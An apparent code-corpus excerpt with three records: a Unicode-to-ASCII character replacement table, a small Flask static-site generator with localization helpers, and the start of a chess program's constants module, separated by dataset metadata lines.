(0x2C69, u"K"),
(0xA740, u"K"),
(0xA742, u"K"),
(0xA744, u"K"),
(0xFF2B, u"K"),
(0x137, u"k"),
(0x199, u"k"),
(0x1E9, u"k"),
(0x29E, u"k"),
(0x1D84, u"k"),
(0x1E31, u"k"),
(0x1E33, u"k"),
(0x1E35, u"k"),
(0x24DA, u"k"),
(0x2C6A, u"k"),
(0xA741, u"k"),
(0xA743, u"k"),
(0xA745, u"k"),
(0xFF4B, u"k"),
(0x24A6, u"(k)"),
(0x139, u"L"),
(0x13B, u"L"),
(0x13D, u"L"),
(0x13F, u"L"),
(0x141, u"L"),
(0x23D, u"L"),
(0x29F, u"L"),
(0x1D0C, u"L"),
(0x1E36, u"L"),
(0x1E38, u"L"),
(0x1E3A, u"L"),
(0x1E3C, u"L"),
(0x24C1, u"L"),
(0x2C60, u"L"),
(0x2C62, u"L"),
(0xA746, u"L"),
(0xA748, u"L"),
(0xA780, u"L"),
(0xFF2C, u"L"),
(0x13A, u"l"),
(0x13C, u"l"),
(0x13E, u"l"),
(0x140, u"l"),
(0x142, u"l"),
(0x19A, u"l"),
(0x234, u"l"),
(0x26B, u"l"),
(0x26C, u"l"),
(0x26D, u"l"),
(0x1D85, u"l"),
(0x1E37, u"l"),
(0x1E39, u"l"),
(0x1E3B, u"l"),
(0x1E3D, u"l"),
(0x24DB, u"l"),
(0x2C61, u"l"),
(0xA747, u"l"),
(0xA749, u"l"),
(0xA781, u"l"),
(0xFF4C, u"l"),
(0x1C7, u"LJ"),
(0x1EFA, u"LL"),
(0x1C8, u"Lj"),
(0x24A7, u"(l)"),
(0x1C9, u"lj"),
(0x1EFB, u"ll"),
(0x2AA, u"ls"),
(0x2AB, u"lz"),
(0x19C, u"M"),
(0x1D0D, u"M"),
(0x1E3E, u"M"),
(0x1E40, u"M"),
(0x1E42, u"M"),
(0x24C2, u"M"),
(0x2C6E, u"M"),
(0xA7FD, u"M"),
(0xA7FF, u"M"),
(0xFF2D, u"M"),
(0x26F, u"m"),
(0x270, u"m"),
(0x271, u"m"),
(0x1D6F, u"m"),
(0x1D86, u"m"),
(0x1E3F, u"m"),
(0x1E41, u"m"),
(0x1E43, u"m"),
(0x24DC, u"m"),
(0xFF4D, u"m"),
(0x24A8, u"(m)"),
(0xD1, u"N"),
(0x143, u"N"),
(0x145, u"N"),
(0x147, u"N"),
(0x14A, u"N"),
(0x19D, u"N"),
(0x1F8, u"N"),
(0x220, u"N"),
(0x274, u"N"),
(0x1D0E, u"N"),
(0x1E44, u"N"),
(0x1E46, u"N"),
(0x1E48, u"N"),
(0x1E4A, u"N"),
(0x24C3, u"N"),
(0xFF2E, u"N"),
(0xF1, u"n"),
(0x144, u"n"),
(0x146, u"n"),
(0x148, u"n"),
(0x149, u"n"),
(0x14B, u"n"),
(0x19E, u"n"),
(0x1F9, u"n"),
(0x235, u"n"),
(0x272, u"n"),
(0x273, u"n"),
(0x1D70, u"n"),
(0x1D87, u"n"),
(0x1E45, u"n"),
(0x1E47, u"n"),
(0x1E49, u"n"),
(0x1E4B, u"n"),
(0x207F, u"n"),
(0x24DD, u"n"),
(0xFF4E, u"n"),
(0x1CA, u"NJ"),
(0x1CB, u"Nj"),
(0x24A9, u"(n)"),
(0x1CC, u"nj"),
(0xD2, u"O"),
(0xD3, u"O"),
(0xD4, u"O"),
(0xD5, u"O"),
(0xD6, u"O"),
(0xD8, u"O"),
(0x14C, u"O"),
(0x14E, u"O"),
(0x150, u"O"),
(0x186, u"O"),
(0x19F, u"O"),
(0x1A0, u"O"),
(0x1D1, u"O"),
(0x1EA, u"O"),
(0x1EC, u"O"),
(0x1FE, u"O"),
(0x20C, u"O"),
(0x20E, u"O"),
(0x22A, u"O"),
(0x22C, u"O"),
(0x22E, u"O"),
(0x230, u"O"),
(0x1D0F, u"O"),
(0x1D10, u"O"),
(0x1E4C, u"O"),
(0x1E4E, u"O"),
(0x1E50, u"O"),
(0x1E52, u"O"),
(0x1ECC, u"O"),
(0x1ECE, u"O"),
(0x1ED0, u"O"),
(0x1ED2, u"O"),
(0x1ED4, u"O"),
(0x1ED6, u"O"),
(0x1ED8, u"O"),
(0x1EDA, u"O"),
(0x1EDC, u"O"),
(0x1EDE, u"O"),
(0x1EE0, u"O"),
(0x1EE2, u"O"),
(0x24C4, u"O"),
(0xA74A, u"O"),
(0xA74C, u"O"),
(0xFF2F, u"O"),
(0xF2, u"o"),
(0xF3, u"o"),
(0xF4, u"o"),
(0xF5, u"o"),
(0xF6, u"o"),
(0xF8, u"o"),
(0x14D, u"o"),
(0x14F, u"o"),
(0x151, u"o"),
(0x1A1, u"o"),
(0x1D2, u"o"),
(0x1EB, u"o"),
(0x1ED, u"o"),
(0x1FF, u"o"),
(0x20D, u"o"),
(0x20F, u"o"),
(0x22B, u"o"),
(0x22D, u"o"),
(0x22F, u"o"),
(0x231, u"o"),
(0x254, u"o"),
(0x275, u"o"),
(0x1D16, u"o"),
(0x1D17, u"o"),
(0x1D97, u"o"),
(0x1E4D, u"o"),
(0x1E4F, u"o"),
(0x1E51, u"o"),
(0x1E53, u"o"),
(0x1ECD, u"o"),
(0x1ECF, u"o"),
(0x1ED1, u"o"),
(0x1ED3, u"o"),
(0x1ED5, u"o"),
(0x1ED7, u"o"),
(0x1ED9, u"o"),
(0x1EDB, u"o"),
(0x1EDD, u"o"),
(0x1EDF, u"o"),
(0x1EE1, u"o"),
(0x1EE3, u"o"),
(0x2092, u"o"),
(0x24DE, u"o"),
(0x2C7A, u"o"),
(0xA74B, u"o"),
(0xA74D, u"o"),
(0xFF4F, u"o"),
(0x152, u"OE"),
(0x276, u"OE"),
(0xA74E, u"OO"),
(0x222, u"OU"),
(0x1D15, u"OU"),
(0x24AA, u"(o)"),
(0x153, u"oe"),
(0x1D14, u"oe"),
(0xA74F, u"oo"),
(0x223, u"ou"),
(0x1A4, u"P"),
(0x1D18, u"P"),
(0x1E54, u"P"),
(0x1E56, u"P"),
(0x24C5, u"P"),
(0x2C63, u"P"),
(0xA750, u"P"),
(0xA752, u"P"),
(0xA754, u"P"),
(0xFF30, u"P"),
(0x1A5, u"p"),
(0x1D71, u"p"),
(0x1D7D, u"p"),
(0x1D88, u"p"),
(0x1E55, u"p"),
(0x1E57, u"p"),
(0x24DF, u"p"),
(0xA751, u"p"),
(0xA753, u"p"),
(0xA755, u"p"),
(0xA7FC, u"p"),
(0xFF50, u"p"),
(0x24AB, u"(p)"),
(0x24A, u"Q"),
(0x24C6, u"Q"),
(0xA756, u"Q"),
(0xA758, u"Q"),
(0xFF31, u"Q"),
(0x138, u"q"),
(0x24B, u"q"),
(0x2A0, u"q"),
(0x24E0, u"q"),
(0xA757, u"q"),
(0xA759, u"q"),
(0xFF51, u"q"),
(0x24AC, u"(q)"),
(0x239, u"qp"),
(0x154, u"R"),
(0x156, u"R"),
(0x158, u"R"),
(0x210, u"R"),
(0x212, u"R"),
(0x24C, u"R"),
(0x280, u"R"),
(0x281, u"R"),
(0x1D19, u"R"),
(0x1D1A, u"R"),
(0x1E58, u"R"),
(0x1E5A, u"R"),
(0x1E5C, u"R"),
(0x1E5E, u"R"),
(0x24C7, u"R"),
(0x2C64, u"R"),
(0xA75A, u"R"),
(0xA782, u"R"),
(0xFF32, u"R"),
(0x155, u"r"),
(0x157, u"r"),
(0x159, u"r"),
(0x211, u"r"),
(0x213, u"r"),
(0x24D, u"r"),
(0x27C, u"r"),
(0x27D, u"r"),
(0x27E, u"r"),
(0x27F, u"r"),
(0x1D63, u"r"),
(0x1D72, u"r"),
(0x1D73, u"r"),
(0x1D89, u"r"),
(0x1E59, u"r"),
(0x1E5B, u"r"),
(0x1E5D, u"r"),
(0x1E5F, u"r"),
(0x24E1, u"r"),
(0xA75B, u"r"),
(0xA783, u"r"),
(0xFF52, u"r"),
(0x24AD, u"(r)"),
(0x15A, u"S"),
(0x15C, u"S"),
(0x15E, u"S"),
(0x160, u"S"),
(0x218, u"S"),
(0x1E60, u"S"),
(0x1E62, u"S"),
(0x1E64, u"S"),
(0x1E66, u"S"),
(0x1E68, u"S"),
(0x24C8, u"S"),
(0xA731, u"S"),
(0xA785, u"S"),
(0xFF33, u"S"),
(0x15B, u"s"),
(0x15D, u"s"),
(0x15F, u"s"),
(0x161, u"s"),
(0x17F, u"s"),
(0x219, u"s"),
(0x23F, u"s"),
(0x282, u"s"),
(0x1D74, u"s"),
(0x1D8A, u"s"),
(0x1E61, u"s"),
(0x1E63, u"s"),
(0x1E65, u"s"),
(0x1E67, u"s"),
(0x1E69, u"s"),
(0x1E9C, u"s"),
(0x1E9D, u"s"),
(0x24E2, u"s"),
(0xA784, u"s"),
(0xFF53, u"s"),
(0x1E9E, u"SS"),
(0x24AE, u"(s)"),
(0xDF, u"ss"),
(0xFB06, u"st"),
(0x162, u"T"),
(0x164, u"T"),
(0x166, u"T"),
(0x1AC, u"T"),
(0x1AE, u"T"),
(0x21A, u"T"),
(0x23E, u"T"),
(0x1D1B, u"T"),
(0x1E6A, u"T"),
(0x1E6C, u"T"),
(0x1E6E, u"T"),
(0x1E70, u"T"),
(0x24C9, u"T"),
(0xA786, u"T"),
(0xFF34, u"T"),
(0x163, u"t"),
(0x165, u"t"),
(0x167, u"t"),
(0x1AB, u"t"),
(0x1AD, u"t"),
(0x21B, u"t"),
(0x236, u"t"),
(0x287, u"t"),
(0x288, u"t"),
(0x1D75, u"t"),
(0x1E6B, u"t"),
(0x1E6D, u"t"),
(0x1E6F, u"t"),
(0x1E71, u"t"),
(0x1E97, u"t"),
(0x24E3, u"t"),
(0x2C66, u"t"),
(0xFF54, u"t"),
(0xDE, u"TH"),
(0xA766, u"TH"),
(0xA728, u"TZ"),
(0x24AF, u"(t)"),
(0x2A8, u"tc"),
(0xFE, u"th"),
(0x1D7A, u"th"),
(0xA767, u"th"),
(0x2A6, u"ts"),
(0xA729, u"tz"),
(0xD9, u"U"),
(0xDA, u"U"),
(0xDB, u"U"),
(0xDC, u"U"),
(0x168, u"U"),
(0x16A, u"U"),
(0x16C, u"U"),
(0x16E, u"U"),
(0x170, u"U"),
(0x172, u"U"),
(0x1AF, u"U"),
(0x1D3, u"U"),
(0x1D5, u"U"),
(0x1D7, u"U"),
(0x1D9, u"U"),
(0x1DB, u"U"),
(0x214, u"U"),
(0x216, u"U"),
(0x244, u"U"),
(0x1D1C, u"U"),
(0x1D7E, u"U"),
(0x1E72, u"U"),
(0x1E74, u"U"),
(0x1E76, u"U"),
(0x1E78, u"U"),
(0x1E7A, u"U"),
(0x1EE4, u"U"),
(0x1EE6, u"U"),
(0x1EE8, u"U"),
(0x1EEA, u"U"),
(0x1EEC, u"U"),
(0x1EEE, u"U"),
(0x1EF0, u"U"),
(0x24CA, u"U"),
(0xFF35, u"U"),
(0xF9, u"u"),
(0xFA, u"u"),
(0xFB, u"u"),
(0xFC, u"u"),
(0x169, u"u"),
(0x16B, u"u"),
(0x16D, u"u"),
(0x16F, u"u"),
(0x171, u"u"),
(0x173, u"u"),
(0x1B0, u"u"),
(0x1D4, u"u"),
(0x1D6, u"u"),
(0x1D8, u"u"),
(0x1DA, u"u"),
(0x1DC, u"u"),
(0x215, u"u"),
(0x217, u"u"),
(0x289, u"u"),
(0x1D64, u"u"),
(0x1D99, u"u"),
(0x1E73, u"u"),
(0x1E75, u"u"),
(0x1E77, u"u"),
(0x1E79, u"u"),
(0x1E7B, u"u"),
(0x1EE5, u"u"),
(0x1EE7, u"u"),
(0x1EE9, u"u"),
(0x1EEB, u"u"),
(0x1EED, u"u"),
(0x1EEF, u"u"),
(0x1EF1, u"u"),
(0x24E4, u"u"),
(0xFF55, u"u"),
(0x24B0, u"(u)"),
(0x1D6B, u"ue"),
(0x1B2, u"V"),
(0x245, u"V"),
(0x1D20, u"V"),
(0x1E7C, u"V"),
(0x1E7E, u"V"),
(0x1EFC, u"V"),
(0x24CB, u"V"),
(0xA75E, u"V"),
(0xA768, u"V"),
(0xFF36, u"V"),
(0x28B, u"v"),
(0x28C, u"v"),
(0x1D65, u"v"),
(0x1D8C, u"v"),
(0x1E7D, u"v"),
(0x1E7F, u"v"),
(0x24E5, u"v"),
(0x2C71, u"v"),
(0x2C74, u"v"),
(0xA75F, u"v"),
(0xFF56, u"v"),
(0xA760, u"VY"),
(0x24B1, u"(v)"),
(0xA761, u"vy"),
(0x174, u"W"),
(0x1F7, u"W"),
(0x1D21, u"W"),
(0x1E80, u"W"),
(0x1E82, u"W"),
(0x1E84, u"W"),
(0x1E86, u"W"),
(0x1E88, u"W"),
(0x24CC, u"W"),
(0x2C72, u"W"),
(0xFF37, u"W"),
(0x175, u"w"),
(0x1BF, u"w"),
(0x28D, u"w"),
(0x1E81, u"w"),
(0x1E83, u"w"),
(0x1E85, u"w"),
(0x1E87, u"w"),
(0x1E89, u"w"),
(0x1E98, u"w"),
(0x24E6, u"w"),
(0x2C73, u"w"),
(0xFF57, u"w"),
(0x24B2, u"(w)"),
(0x1E8A, u"X"),
(0x1E8C, u"X"),
(0x24CD, u"X"),
(0xFF38, u"X"),
(0x1D8D, u"x"),
(0x1E8B, u"x"),
(0x1E8D, u"x"),
(0x2093, u"x"),
(0x24E7, u"x"),
(0xFF58, u"x"),
(0x24B3, u"(x)"),
(0xDD, u"Y"),
(0x176, u"Y"),
(0x178, u"Y"),
(0x1B3, u"Y"),
(0x232, u"Y"),
(0x24E, u"Y"),
(0x28F, u"Y"),
(0x1E8E, u"Y"),
(0x1EF2, u"Y"),
(0x1EF4, u"Y"),
(0x1EF6, u"Y"),
(0x1EF8, u"Y"),
(0x1EFE, u"Y"),
(0x24CE, u"Y"),
(0xFF39, u"Y"),
(0xFD, u"y"),
(0xFF, u"y"),
(0x177, u"y"),
(0x1B4, u"y"),
(0x233, u"y"),
(0x24F, u"y"),
(0x28E, u"y"),
(0x1E8F, u"y"),
(0x1E99, u"y"),
(0x1EF3, u"y"),
(0x1EF5, u"y"),
(0x1EF7, u"y"),
(0x1EF9, u"y"),
(0x1EFF, u"y"),
(0x24E8, u"y"),
(0xFF59, u"y"),
(0x24B4, u"(y)"),
(0x179, u"Z"),
(0x17B, u"Z"),
(0x17D, u"Z"),
(0x1B5, u"Z"),
(0x21C, u"Z"),
(0x224, u"Z"),
(0x1D22, u"Z"),
(0x1E90, u"Z"),
(0x1E92, u"Z"),
(0x1E94, u"Z"),
(0x24CF, u"Z"),
(0x2C6B, u"Z"),
(0xA762, u"Z"),
(0xFF3A, u"Z"),
(0x17A, u"z"),
(0x17C, u"z"),
(0x17E, u"z"),
(0x1B6, u"z"),
(0x21D, u"z"),
(0x225, u"z"),
(0x240, u"z"),
(0x290, u"z"),
(0x291, u"z"),
(0x1D76, u"z"),
(0x1D8E, u"z"),
(0x1E91, u"z"),
(0x1E93, u"z"),
(0x1E95, u"z"),
(0x24E9, u"z"),
(0x2C6C, u"z"),
(0xA763, u"z"),
(0xFF5A, u"z"),
(0x24B5, u"(z)"),
(0x2070, u"0"),
(0x2080, u"0"),
(0x24EA, u"0"),
(0x24FF, u"0"),
(0xFF10, u"0"),
(0xB9, u"1"),
(0x2081, u"1"),
(0x2460, u"1"),
(0x24F5, u"1"),
(0x2776, u"1"),
(0x2780, u"1"),
(0x278A, u"1"),
(0xFF11, u"1"),
(0x2488, u"1."),
(0x2474, u"(1)"),
(0xB2, u"2"),
(0x2082, u"2"),
(0x2461, u"2"),
(0x24F6, u"2"),
(0x2777, u"2"),
(0x2781, u"2"),
(0x278B, u"2"),
(0xFF12, u"2"),
(0x2489, u"2."),
(0x2475, u"(2)"),
(0xB3, u"3"),
(0x2083, u"3"),
(0x2462, u"3"),
(0x24F7, u"3"),
(0x2778, u"3"),
(0x2782, u"3"),
(0x278C, u"3"),
(0xFF13, u"3"),
(0x248A, u"3."),
(0x2476, u"(3)"),
(0x2074, u"4"),
(0x2084, u"4"),
(0x2463, u"4"),
(0x24F8, u"4"),
(0x2779, u"4"),
(0x2783, u"4"),
(0x278D, u"4"),
(0xFF14, u"4"),
(0x248B, u"4."),
(0x2477, u"(4)"),
(0x2075, u"5"),
(0x2085, u"5"),
(0x2464, u"5"),
(0x24F9, u"5"),
(0x277A, u"5"),
(0x2784, u"5"),
(0x278E, u"5"),
(0xFF15, u"5"),
(0x248C, u"5."),
(0x2478, u"(5)"),
(0x2076, u"6"),
(0x2086, u"6"),
(0x2465, u"6"),
(0x24FA, u"6"),
(0x277B, u"6"),
(0x2785, u"6"),
(0x278F, u"6"),
(0xFF16, u"6"),
(0x248D, u"6."),
(0x2479, u"(6)"),
(0x2077, u"7"),
(0x2087, u"7"),
(0x2466, u"7"),
(0x24FB, u"7"),
(0x277C, u"7"),
(0x2786, u"7"),
(0x2790, u"7"),
(0xFF17, u"7"),
(0x248E, u"7."),
(0x247A, u"(7)"),
(0x2078, u"8"),
(0x2088, u"8"),
(0x2467, u"8"),
(0x24FC, u"8"),
(0x277D, u"8"),
(0x2787, u"8"),
(0x2791, u"8"),
(0xFF18, u"8"),
(0x248F, u"8."),
(0x247B, u"(8)"),
(0x2079, u"9"),
(0x2089, u"9"),
(0x2468, u"9"),
(0x24FD, u"9"),
(0x277E, u"9"),
(0x2788, u"9"),
(0x2792, u"9"),
(0xFF19, u"9"),
(0x2490, u"9."),
(0x247C, u"(9)"),
(0x2469, u"10"),
(0x24FE, u"10"),
(0x277F, u"10"),
(0x2789, u"10"),
(0x2793, u"10"),
(0x2491, u"10."),
(0x247D, u"(10)"),
(0x246A, u"11"),
(0x24EB, u"11"),
(0x2492, u"11."),
(0x247E, u"(11)"),
(0x246B, u"12"),
(0x24EC, u"12"),
(0x2493, u"12."),
(0x247F, u"(12)"),
(0x246C, u"13"),
(0x24ED, u"13"),
(0x2494, u"13."),
(0x2480, u"(13)"),
(0x246D, u"14"),
(0x24EE, u"14"),
(0x2495, u"14."),
(0x2481, u"(14)"),
(0x246E, u"15"),
(0x24EF, u"15"),
(0x2496, u"15."),
(0x2482, u"(15)"),
(0x246F, u"16"),
(0x24F0, u"16"),
(0x2497, u"16."),
(0x2483, u"(16)"),
(0x2470, u"17"),
(0x24F1, u"17"),
(0x2498, u"17."),
(0x2484, u"(17)"),
(0x2471, u"18"),
(0x24F2, u"18"),
(0x2499, u"18."),
(0x2485, u"(18)"),
(0x2472, u"19"),
(0x24F3, u"19"),
(0x249A, u"19."),
(0x2486, u"(19)"),
(0x2473, u"20"),
(0x24F4, u"20"),
(0x249B, u"20."),
(0x2487, u"(20)"),
(0xAB, u'"'),
(0xBB, u'"'),
(0x201C, u'"'),
(0x201D, u'"'),
(0x201E, u'"'),
(0x2033, u'"'),
(0x2036, u'"'),
(0x275D, u'"'),
(0x275E, u'"'),
(0x276E, u'"'),
(0x276F, u'"'),
(0xFF02, u'"'),
(0x2018, u"'"),
(0x2019, u"'"),
(0x201A, u"'"),
(0x201B, u"'"),
(0x2032, u"'"),
(0x2035, u"'"),
(0x2039, u"'"),
(0x203A, u"'"),
(0x275B, u"'"),
(0x275C, u"'"),
(0xFF07, u"'"),
(0x2010, u"-"),
(0x2011, u"-"),
(0x2012, u"-"),
(0x2013, u"-"),
(0x2014, u"-"),
(0x207B, u"-"),
(0x208B, u"-"),
(0xFF0D, u"-"),
(0x2045, u"["),
(0x2772, u"["),
(0xFF3B, u"["),
(0x2046, u"]"),
(0x2773, u"]"),
(0xFF3D, u"]"),
(0x207D, u"("),
(0x208D, u"("),
(0x2768, u"("),
(0x276A, u"("),
(0xFF08, u"("),
(0x2E28, u"(("),
(0x207E, u")"),
(0x208E, u")"),
(0x2769, u")"),
(0x276B, u")"),
(0xFF09, u")"),
(0x2E29, u"))"),
(0x276C, u"<"),
(0x2770, u"<"),
(0xFF1C, u"<"),
(0x276D, u">"),
(0x2771, u">"),
(0xFF1E, u">"),
(0x2774, u"{"),
(0xFF5B, u"{"),
(0x2775, u"}"),
(0xFF5D, u"}"),
(0x207A, u"+"),
(0x208A, u"+"),
(0xFF0B, u"+"),
(0x207C, u"="),
(0x208C, u"="),
(0xFF1D, u"="),
(0xFF01, u"!"),
(0x203C, u"!!"),
(0x2049, u"!?"),
(0xFF03, u"#"),
(0xFF04, u"$"),
(0x2052, u"%"),
(0xFF05, u"%"),
(0xFF06, u"&"),
(0x204E, u"*"),
(0xFF0A, u"*"),
(0xFF0C, u","),
(0xFF0E, u"."),
(0x2044, u"/"),
(0xFF0F, u"/"),
(0xFF1A, u":"),
(0x204F, u";"),
(0xFF1B, u";"),
(0xFF1F, u"?"),
(0x2047, u"??"),
(0x2048, u"?!"),
(0xFF20, u"@"),
(0xFF3C, u"\\"),
(0x2038, u"^"),
(0xFF3E, u"^"),
(0xFF3F, u"_"),
(0x2053, u"~"),
(0xFF5E, u"~"),
]
translate_table = codepoint_to_self + codepoint_to_replacement
| gpl-3.0 | 514,629,070,680,057,000 | -4,901,167,563,007,123,000 | 18.654401 | 62 | 0.383429 | false |
lem-usp/Bio507 | site.py | 1 | 3672 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals # unicode by default
import sys
import datetime
from collections import OrderedDict
import pandoc
#import bib
from flask import Flask
from flask import render_template, redirect, url_for
from flaskext.babel import Babel
from flask_flatpages import FlatPages
from flask_frozen import Freezer
# TODO:
# * Get babel locale from request path
# Create the Flask app
app = Flask(__name__)
# Load settings
app.config.from_pyfile('settings/common.py')
app.config.from_pyfile('settings/local_settings.py', silent=True)
if len(sys.argv) > 2:
extra_conf = sys.argv[2]
app.config.from_pyfile('settings/{}_settings.py'.format(extra_conf), silent=True)
# Add the babel extension
babel = Babel(app)
# Add the FlatPages extension
pages = FlatPages(app)
# Add the Frozen extension
freezer = Freezer(app)
#
# Utils
#
# Frozen url generators
@freezer.register_generator
def default_locale_urls():
''' Genarates the urls for default locale without prefix. '''
for page in pages:
yield '/{}/'.format(remove_l10n_prefix(page.path))
@freezer.register_generator
def page_urls():
''' Genarates the urls with locale prefix. '''
for page in pages:
yield '/{}/'.format(page.path)
# l10n helpers
def has_l10n_prefix(path):
''' Verifies if the path have a localization prefix. '''
return reduce(lambda x, y: x or y, [path.startswith(l)
for l in app.config.get('AVAILABLE_LOCALES', [])])
def add_l10n_prefix(path, locale=app.config.get('DEFAULT_LOCALE')):
'''' Add localization prefix if necessary. '''
return path if has_l10n_prefix(path) else '{}/{}'.format(locale, path)
def remove_l10n_prefix(path, locale=app.config.get('DEFAULT_LOCALE')):
''' Remove specific localization prefix. '''
return path if not path.startswith(locale) else path[(len(locale) + 1):]
# Make remove_l10n_prefix accessible to Jinja
app.jinja_env.globals.update(remove_l10n_prefix=remove_l10n_prefix)
# Structure helpers
def render_markdown(text):
''' Render Markdown text to HTML. '''
doc = pandoc.Document()
# doc.bib(app.config.get('BIB_FILE', 'static/papers.bib'))
doc.markdown = text.encode('utf8')
return unicode(doc.html, 'utf8')
app.config['FLATPAGES_HTML_RENDERER'] = render_markdown
#
# Routes
#
@app.route('/')
def root():
''' Main page '''
# Get the page
path = 'Main'
page = pages.get_or_404(add_l10n_prefix(path))
today = datetime.datetime.now().strftime("%B %dth %Y")
return render_template('root.html', today=today, page=page, pages=pages)
#def get_papers():
# bib_file = open(app.config.get('BIB_FILE', 'static/papers.bib'))
# b = bib.Bibparser(bib_file.read())
# b.parse()
# return b
@app.route('/<path:path>/')
def page(path):
''' All pages from markdown files '''
# Get the page
page = pages.get_or_404(add_l10n_prefix(path))
# Get custom template
template = page.meta.get('template', 'page.html')
# Verify if need redirect
redirect_ = page.meta.get('redirect', None)
if redirect_:
return redirect(url_for('page', path=redirect_))
# if path == 'Papers' or path == add_l10n_prefix('Papers'):
# b = get_papers()
# return render_template(template, page=page, pages=pages, bib=b)
today = datetime.datetime.now().strftime("%B %dth %Y")
# Render the page
return render_template(template, page=page, today=today, pages=pages)
#
# Main
#
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'build':
freezer.freeze()
else:
app.run(port=8000)
| mit | 8,909,783,212,581,088,000 | 8,342,799,932,278,771,000 | 24.324138 | 85 | 0.663399 | false |
importsfromgooglecode/pychess | lib/pychess/Utils/const.py | 20 | 9143 | # -*- coding: UTF-8 -*-
################################################################################
# PyChess information #
################################################################################
NAME = "PyChess"
ENGINES_XML_API_VERSION = "0.12"
################################################################################
# Player info #
################################################################################
# Player types
LOCAL, ARTIFICIAL, REMOTE = range(3)
# Engine strengths
EASY, INTERMEDIATE, EXPERT = range(3)
# Player colors
WHITE, BLACK = range(2)
################################################################################
# Game values #
################################################################################
# Game states
WAITING_TO_START, PAUSED, RUNNING, DRAW, WHITEWON, BLACKWON, KILLED, \
ADJOURNED, ABORTED, UNKNOWN_STATE = range(10)
reprResult = ["*", "*", "*", "1/2-1/2", "1-0", "0-1", "?", "*", "?", "?"]
UNDOABLE_STATES = (DRAW, WHITEWON, BLACKWON)
UNFINISHED_STATES = (WAITING_TO_START, PAUSED, RUNNING, UNKNOWN_STATE)
# Chess variants
NORMALCHESS, CORNERCHESS, SHUFFLECHESS, FISCHERRANDOMCHESS, RANDOMCHESS, \
ASYMMETRICRANDOMCHESS, UPSIDEDOWNCHESS, PAWNSPUSHEDCHESS, PAWNSPASSEDCHESS, \
THEBANCHESS, PAWNODDSCHESS, KNIGHTODDSCHESS, ROOKODDSCHESS, QUEENODDSCHESS, \
BLINDFOLDCHESS, HIDDENPAWNSCHESS, HIDDENPIECESCHESS, ALLWHITECHESS, \
ATOMICCHESS, BUGHOUSECHESS, CRAZYHOUSECHESS, LOSERSCHESS, SUICIDECHESS, \
WILDCASTLECHESS, WILDCASTLESHUFFLECHESS, KINGOFTHEHILLCHESS = range(26)
UNSUPPORTED = (BUGHOUSECHESS,)
# Chess variant groups
VARIANTS_BLINDFOLD, VARIANTS_ODDS, VARIANTS_SHUFFLE, VARIANTS_OTHER, VARIANTS_OTHER_NONSTANDARD = range(5)
# Action errors
ACTION_ERROR_NOT_OUT_OF_TIME, \
ACTION_ERROR_CLOCK_NOT_STARTED, ACTION_ERROR_SWITCH_UNDERWAY, \
ACTION_ERROR_CLOCK_NOT_PAUSED, ACTION_ERROR_TOO_LARGE_UNDO, \
ACTION_ERROR_NONE_TO_ACCEPT, ACTION_ERROR_NONE_TO_WITHDRAW, \
ACTION_ERROR_NONE_TO_DECLINE, = range(8)
# Game state reasons
ABORTED_ADJUDICATION, ABORTED_AGREEMENT, ABORTED_COURTESY, ABORTED_EARLY, \
ABORTED_SERVER_SHUTDOWN, ADJOURNED_COURTESY, ABORTED_DISCONNECTION, \
ADJOURNED_AGREEMENT, ADJOURNED_LOST_CONNECTION, ADJOURNED_SERVER_SHUTDOWN, \
ADJOURNED_COURTESY_WHITE, ADJOURNED_COURTESY_BLACK, \
ADJOURNED_LOST_CONNECTION_WHITE, ADJOURNED_LOST_CONNECTION_BLACK, \
DRAW_50MOVES, DRAW_ADJUDICATION, DRAW_AGREE, DRAW_CALLFLAG, DRAW_INSUFFICIENT, \
DRAW_EQUALMATERIAL, DRAW_LENGTH, DRAW_REPITITION, DRAW_STALEMATE, \
DRAW_BLACKINSUFFICIENTANDWHITETIME, DRAW_WHITEINSUFFICIENTANDBLACKTIME, \
WON_ADJUDICATION, WON_CALLFLAG, WON_DISCONNECTION, WON_MATE, WON_RESIGN, \
WON_LESSMATERIAL, WON_NOMATERIAL, WON_KINGEXPLODE, WON_KINGINCENTER, \
WHITE_ENGINE_DIED, BLACK_ENGINE_DIED, DISCONNECTED, UNKNOWN_REASON = range(38)
UNDOABLE_REASONS = (DRAW_50MOVES, DRAW_INSUFFICIENT, DRAW_LENGTH,
DRAW_REPITITION, DRAW_STALEMATE, DRAW_AGREE, DRAW_CALLFLAG, \
DRAW_BLACKINSUFFICIENTANDWHITETIME, \
DRAW_WHITEINSUFFICIENTANDBLACKTIME, \
WON_MATE, WON_NOMATERIAL, WON_CALLFLAG, WON_RESIGN)
UNRESUMEABLE_REASONS = (DRAW_50MOVES, DRAW_INSUFFICIENT, DRAW_LENGTH, \
DRAW_REPITITION, DRAW_STALEMATE, WON_MATE, WON_NOMATERIAL)
# Player actions
RESIGNATION = "resignation"
FLAG_CALL = "flag call"
DRAW_OFFER = "draw offer"
ABORT_OFFER = "abort offer"
ADJOURN_OFFER = "adjourn offer"
PAUSE_OFFER = "pause offer"
RESUME_OFFER = "resume offer"
SWITCH_OFFER = "switch offer"
TAKEBACK_OFFER = "takeback offer"
MATCH_OFFER = "match offer"
HURRY_ACTION = "hurry action"
CHAT_ACTION = "chat action"
ACTIONS = (RESIGNATION, FLAG_CALL, DRAW_OFFER, ABORT_OFFER, ADJOURN_OFFER, \
PAUSE_OFFER, RESUME_OFFER, SWITCH_OFFER, TAKEBACK_OFFER, \
MATCH_OFFER, HURRY_ACTION, CHAT_ACTION)
OFFERS = (DRAW_OFFER, ABORT_OFFER, ADJOURN_OFFER, PAUSE_OFFER, \
RESUME_OFFER, SWITCH_OFFER, TAKEBACK_OFFER, MATCH_OFFER)
INGAME_ACTIONS = (RESIGNATION, FLAG_CALL, DRAW_OFFER, ABORT_OFFER, \
ADJOURN_OFFER, PAUSE_OFFER, SWITCH_OFFER, HURRY_ACTION)
# A few nice to have boards
FEN_EMPTY = "4k3/8/8/8/8/8/8/4K3 w - - 0 1"
FEN_START = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1"
################################################################################
# Search values #
################################################################################
hashfALPHA, hashfBETA, hashfEXACT, hashfBAD = range(4)
# Engine modes
NORMAL, ANALYZING, INVERSE_ANALYZING = range(3)
################################################################################
# Piece types #
################################################################################
# BPAWN is a pawn that moves in the opposite direction
EMPTY, PAWN, KNIGHT, BISHOP, ROOK, QUEEN, KING, BPAWN = range(8)
# Is sliding piece
